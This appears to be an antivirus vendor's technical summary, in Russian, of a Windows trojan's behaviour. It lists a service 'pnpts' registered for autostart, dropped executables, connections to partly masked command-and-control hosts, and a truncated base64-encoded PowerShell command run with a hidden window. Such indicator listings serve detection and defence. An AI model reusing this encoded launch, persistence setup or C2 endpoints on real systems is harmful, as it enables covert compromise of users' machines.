Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\pnpts] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\pnpts] 'ImagePath' = '"<SYSTEM32>\umpo\pnpts.exe"'
- 'pnpts' "<SYSTEM32>\umpo\pnpts.exe"
- 'pnpts' <SYSTEM32>\umpo\pnpts.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAGMAagBuAHcAZwBwAD0AKAAoACcARAAnACsAJwBiAG8AJwApACsAJwAwACcAKwAoACcAcwAnACsAJwB1AGMAJwApACkAOwAuACgAJwBuACcAKwAnAGUAdwAtAGkAJwArACcAdABlAG0AJwApACAAJABFAE4AdgA6AFUAUwBlAFIAcAByAG8ARgBJAE...
- %HOMEPATH%\ctn66fz\mp9t847\k1r4jlz.exe
- <SYSTEM32>\umpo\pnpts.exe
- %HOMEPATH%\ctn66fz\mp9t847\k1r4jlz.exe в <SYSTEM32>\umpo\pnpts.exe
- '18#.#15.227.107':443
- http://ra###submit.com/search_test/s/
- http://18#.##5.227.107:443/hD9VRIVun8TRK/Wmj9r0Y0tgN/zlsczcCUJxG/Skvvlf9tpr31P/jmwfI6D2rQEVCP/gpNlnCNBjypcI/ via 18#.#15.227.107
- DNS ASK ra###submit.com
- '%HOMEPATH%\ctn66fz\mp9t847\k1r4jlz.exe'
- '<SYSTEM32>\umpo\pnpts.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAGMAagBuAHcAZwBwAD0AKAAoACcARAAnACsAJwBiAG8AJwApACsAJwAwACcAKwAoACcAcwAnACsAJwB1AGMAJwApACkAOwAuACgAJwBuACcAKwAnAGUAdwAtAGkAJwArACcAdABlAG0AJwApACAAJABFAE4AdgA6AFUAUwBlAFIAcAByAG8ARgBJAE...' (со скрытым окном)